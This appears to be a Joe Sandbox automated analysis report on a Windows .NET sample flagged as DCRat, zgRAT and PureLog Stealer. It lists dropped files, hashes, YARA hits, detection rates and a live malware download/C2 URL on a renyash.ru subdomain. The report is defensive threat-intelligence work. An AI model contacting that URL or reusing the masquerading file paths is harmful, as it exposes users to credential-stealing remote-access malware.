C:\Users\Default\Pictures\AaHCyFZRuOMjGDqdgJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AXpVrZKc.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EZcCRmIO.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KRFbuSND.log | 8% | ReversingLabs |
C:\Users\user\Desktop\MjEjEgzx.log | 8% | ReversingLabs |
C:\Users\user\Desktop\VVwrSJqk.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\cYVGOFtR.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\iczfvMBI.log | 25% | ReversingLabs |
C:\Users\user\Desktop\kCewxyIz.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\kKNOcijE.log | 25% | ReversingLabs |
C:\Users\user\Desktop\kwtgfRAG.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\ufMwPuFo.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\vqImhKDh.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
Source | Detection | Scanner | Label
http://048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
048038cm.renyash.ru | 104.21.38.84 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.38.84 | 048038cm.renyash.ru | United States | 13335 | CLOUDFLARENETUS | true
                                                                        IP
                                                                        127.0.0.1
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1581724
                                                                        Start date and time:2024-12-28 20:41:08 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 57s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:52
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:ZZ2sTsJFrt.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:403138422d8da9fdd31fe147959a1403.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winEXE@74/341@2/2
                                                                        EGA Information:
                                                                        • Successful, ratio: 50%
                                                                        HCA Information:
                                                                        • Successful, ratio: 62%
                                                                        • Number of executed functions: 210
                                                                        • Number of non-executed functions: 94
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.218.208.109, 172.202.163.200, 13.107.246.63
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target HyperPortContainerproviderinto.exe, PID 3168 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
14:42:10 | API Interceptor | 418x Sleep call for process: powershell.exe modified
14:42:31 | API Interceptor | 1951933x Sleep call for process: dasHost.exe modified
14:42:32 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.38.84 | 67VB5TS184.exe | malicious | DCRat, PureLog Stealer, zgRAT | 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
 | gkcQYEdJSO.exe | malicious | DCRat, PureLog Stealer, zgRAT | 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php
                                                                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | FB.html | malicious | Unknown | 104.17.25.14
 | http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh | malicious | Unknown | 104.26.9.163
 | http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 104.17.25.14
 | Set-up.exe | malicious | LummaC | 104.21.87.112
 | test5.exe | malicious | CobaltStrike, Metasploit | 104.21.34.5
 | iien1HBbB3.exe | malicious | LummaC | 104.21.66.86
 | SgMuuLxOCJ.exe | malicious | LummaC | 104.21.2.51
 | oe9KS7ZHUc.exe | malicious | LummaC | 104.21.66.86
 | MPgkx6bQIQ.exe | malicious | LummaC | 172.67.157.254
 | l0zocrLiVW.exe | malicious | LummaC | 172.67.157.254
                                                                        No context
                                                                        No context
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):157
                                                                        Entropy (8bit):5.6554762689191875
                                                                        Encrypted:false
                                                                        SSDEEP:3:+RwATUvCbWEYlDpsXrnILTS1TH0hevXrX8aVCtPGU2o2QE4DmTTu0Gxq:Q+3Dp6u+TlzbzlQEzTu0t
                                                                        MD5:7736855EB89CA610A8422FB1184E316D
                                                                        SHA1:DE8F682681805F0C970EB41881728AB250DE0BBA
                                                                        SHA-256:F4A39ABE814D14166BBE7F5DEF37DFED3F17E0E5DA0D08DB5D728C0B74E9D24E
                                                                        SHA-512:33F291ECED545CC723390007F3AD00DF56C2C266D3B417C42A4D77AEB616275DB4F5596139F5F1C2660F933342292E1D128D7CBDE60132162D8375645C3DDF34
                                                                        Malicious:false
                                                                        Preview:47f0IanURYdhF01tUMRFkkkV2n3h8YQDPJigLsNPxtEYRrpyJY4KzbiUXK8fhGV2HaS5RVim8CS0fMDK7EXkeFNykOIBtssrYLQ0ZugyzSMwIsyKGxhcsvYBMdUDMh2QTlcU5MvNiiuL3ap2a846KQ8mxOo5Z
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....uig................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B.......................H...........`...........$................................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{}...:....& ....8........0.......... ........8........E....d...................8_...~....:.... ....~....{....:....& ....8....~....(U... .... .... ....s....~....(Y....... ....8.......... ....~....{....:i...& ....8^...r...ps....z*....~....(]...~....(a... ....?.... ....~....{a...9..
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (547), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):547
                                                                        Entropy (8bit):5.8771622675901565
                                                                        Encrypted:false
                                                                        SSDEEP:12:ic2l55Sx1ouUoM0pw+Yzww512ovSC/PiCmpa30A3Cr2NhMZUmUkRQvlWV:F2X5Sx1hw+Yzw4dvx6pa3g2LEUmUhtS
                                                                        MD5:58A3385190DC3E4A54D36EAF62D69108
                                                                        SHA1:FB3D784EE2A7067046D4E76202DB73AB4012750F
                                                                        SHA-256:421BD428647BF2D36CEC4C07DEEC2FFC7ED2ADFA3045CA67B3E5F0F444F82809
                                                                        SHA-512:A4D9CDA64BAF2D81EFEEDE95BF6550A9BB9856340D15CAC581D3A1C48E3F1B0BC01288EEE5EC3EF02F2C556ECA63E11AA4224B68C563464F65FDF478FDCB4A74
                                                                        Malicious:false
                                                                        Preview:PdP3BT3JBMIvxcmOm5FDmzgqizxE6bv77Im6tB40WykkG2I70Xqe0Z4Z7iULfyMjbKypzqfkAOryP6kqr0OjvRHiNM9KrtUhlBJ6DdHJ2FdlrGKA8nepknyKCPbmrU3R3KMOwonOsEqqxg0GC8MEOp68M93yBfciLLrh46OUAP6f7HWgYUksHzCONOBxuzNNlHemyTMFu2E9taAFnWZq4uaWIdUp5ajLCs4zntsFHf8PvDfwN5KYZgT1rHdV8gJTT26AgLc3oTiZvLlE7ic9QKvgZCHfPWGkVo62HePCdQtG74FggZXaEJCIHaldD6nRM7DHOt7cSZg9apie7l908qgLlxuq3w9gnc3A08Rwb5IpnDrc2Ggb7wTgb1fb8QjgaAW8vhn8UMYDh0iiGSyxQhi0IWi9d0xLWmOnqsqUchHvXP8kT6VqcvP2bgzY9ofdYNr5m52XldUsaxc2Y7qgfHskWWLJ2RVyBnWJiD8XD7E8bhcoD6AB888RfGiPtseUIgrwbSUU9SchCuIz4hG5QTzCoEobesnVcu0
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):251
                                                                        Entropy (8bit):5.731946784895442
                                                                        Encrypted:false
                                                                        SSDEEP:6:Swvk1qCrsCppLnSYDyodnlgT0/uQGlEw+R6cjTpb:Rv4qCrDlOzYmCw+oSTF
                                                                        MD5:AF3B832704749A8B7337BDADF3EC0DE2
                                                                        SHA1:C513DF0B954000FE0AF3558048218C862D064397
                                                                        SHA-256:78DC85B6FA21E8CF276D8475FDD456E7869AA7DF537FAA3E101327D153ED2FCB
                                                                        SHA-512:D83F250FE8A422C2A9DC10F1AE4FD950C919B1EA986E59CFC0AFB15D9FA9E36BD1CC3607E4514BEC7A2E1D0FBADF7D5EBA2A0C81CAFCF11B959A42A40F501F38
                                                                        Malicious:false
                                                                        Preview:27tpAGQqaSiRIH02ZcYO4OvsIPALKSyStjAp6Nze0vUEFiZL1MLl66VoLBhuFFfIdQhiGL6Lm3XI4qnj0yU7GNVxOWd5qFYvPLlyA0FqQA8DiMueX73RuhCQ5uUurAfhfl3sFyjAtorFOSOCm8htLHAsIV3QgU8Pfbh6SBYjY3hG06BmgRIsdwWXkLju4SdYpbkwuRtkk7URk42MTQtOMQvtFKVHbooFaIaYVP2OihIfbExqTXbnjPLZp1r
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x195ddda4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.4222038800358537
                                                                        Encrypted:false
                                                                        SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                        MD5:543BC5D1B938C25A863FEC34F025664D
                                                                        SHA1:1E750CDB7F9DC99AB289386EAB5A1DD7EF0BFBCD
                                                                        SHA-256:2DC4ADFBB21F9C8CBC03ECDE00F591F1ACA65B105BE2AAD1CED31A5A8BDD46E0
                                                                        SHA-512:0770A5B4B66B3D7BB5DBE068D530505C27AB561025D3748A4B9884EA497AB28CE4646AE9DDD6CF6DD99064356C403A655ADD71B78BB618B603130286FA2F80CD
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (447), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):447
                                                                        Entropy (8bit):5.838557754908732
                                                                        Encrypted:false
                                                                        SSDEEP:12:XtrCClGOO55RmFad1hmgw/HuKL2GrkXy/Wl:XtZlGN8CXXoBL2PLl
                                                                        MD5:470BFDEB64ADBD865CBC1911AFD82D30
                                                                        SHA1:24320C7EC1444A0C33C348D32DB4AF41D32EE476
                                                                        SHA-256:2D3A47D596FB1674A617529F9CD3C3B60801AABCB92B9AE41D3415D14AEFBD46
                                                                        SHA-512:BC3CF8F1337F94B7038AC1C797D9E346D27A0CF0139DA558B2584249C26296443C1A83B3D819D0F44C3D81F68A48A5EC6F370C54A6D64F9787CCB95B583E4989
                                                                        Malicious:false
                                                                        Preview:Pu7tVMmjDyqoHWn20QoHER4N9PUVSkRJgNz3evXbs3rBOKh0Hu0vBYW70utG1RQcggI4gtYE2MZKk28yrdNiugHI02DuBRkbnOerCnTXWv2z8LW7v4YXDrrAZ9DoqnCkm7hWYQvEK0L9nSJofF9H3MX5geSDjoqssSMAoAjeIUNMfsWGzYJlo5raklz38sefKdQVFIAffe8i8KayHMNLfFDxkwaDKpga0sCCbBArYnFJ6JbZLAwveT9FZduTr7Uz8isQIXXGLgw1930bUB2K3u5hs7m7Qr9bTQLYaLRxnpk7gIFfmT8qFK6OnLiKuZ0ehVitscAJuEgNK7Ak1HV6sSWJT6uPmGDOzFaLjWxKTz6AntEpK8SnE3vP9ZZwruhnBSXEhzAfTKn3WVfk2FEnxZK6TKLK7BciSS9VV9IV8xT3P22n3y3mp3zlHbuWnzh
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2008064
                                                                        Entropy (8bit):7.561218073847526
                                                                        Encrypted:false
                                                                        SSDEEP:49152:4Zxl12Ref9smYan+7TzjNWScGYDe9eq97DUczT:4DzKehnMhtXY6rZYc
                                                                        MD5:34EAB3FCCF84F6B9ABF20B49DB5FCF6E
                                                                        SHA1:BEF38B623BB9C1A88367325E54A759E37DC49A13
                                                                        SHA-256:48DD9601F2067474FA2CB66FE39798B6FE5AB41A51104E2A40247E473B082C2B
                                                                        SHA-512:4666A96BA8CAF17CD00CD8A54949457371013C5B864EB4394AA80A240A8EBC53855A04AD1D5477AA3BC3AAF8010F9B7AFE8A9E5302D6A21DD49944DAE0D36588
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (392), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):392
                                                                        Entropy (8bit):5.854868294174625
                                                                        Encrypted:false
                                                                        SSDEEP:6:6Gi7SAS/oivLKVsBCczCZdgGB+uMYMVW/297DxlSoCmJ2lNoLAOYhqGOK:fTRCutfVb7tV2lsA5qGl
                                                                        MD5:3131B0900B5ED77C0604A125F13DFAB6
                                                                        SHA1:E23F38391E0E02D7324B0BD85CEF6BF54EAFF36A
                                                                        SHA-256:8FEBCD06DA0AD7CAAFA221E3D5DC56A4CD9F15E617F9D36CE75F95B8BE359029
                                                                        SHA-512:2D6A047F05086319C9486C673EE1885D3A59571509C35615A3ACF3330CE1AE41370EA247B91919CD50F799AEE6F035BEC0278AFEF229165D543CDCE2C32EAC75
                                                                        Malicious:false
                                                                        Preview:YVUZLW7DAgxWXuNMphPF7kO3vOjkC8b2Kag7vTPtYfHCJusspZAs6QayHbo7xXBBE4L7OPbWSgrbdMuAf04m7s54As0ToR5AeG7OjveZ8oaai8U4rnb7cYDV9R6gYHrAkq6XOgbuWeoTRfVBX5mBz8hGClOSy7B06a01C7qKMrl8utDd55JdeqLmJ0UmRJ6YdxW1pd9ZPbyIXjVSivW2yhVQPNsLnD3DuMe6XMyb6tNC1CPjeBEgwDj5bGmbvxvLivXKEZ5W646EUSYM8Jql9XQqnjeQjXqI8CeGpEeFGsj1HelIsacmGKMKeqhf4pwiOxGSxRh3olfQxYjI7WiI5EBxzUl8h8Lb5BnTXTUa3i7fo5WGHYiiGonJwScdqiWpaEVwvPuo
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):1179
                                                                        Entropy (8bit):5.354252320228764
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
                                                                        MD5:074445AD437DEED8A22F11A846280CE2
                                                                        SHA1:23025D83D7C33396A5F736FC6F9945976CFCD5D1
                                                                        SHA-256:B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
                                                                        SHA-512:440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):19253
                                                                        Entropy (8bit):5.005753878328145
                                                                        Encrypted:false
                                                                        SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                        MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                        SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                        SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                        SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                        Malicious:false
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                        MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                        SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                        SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                        SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
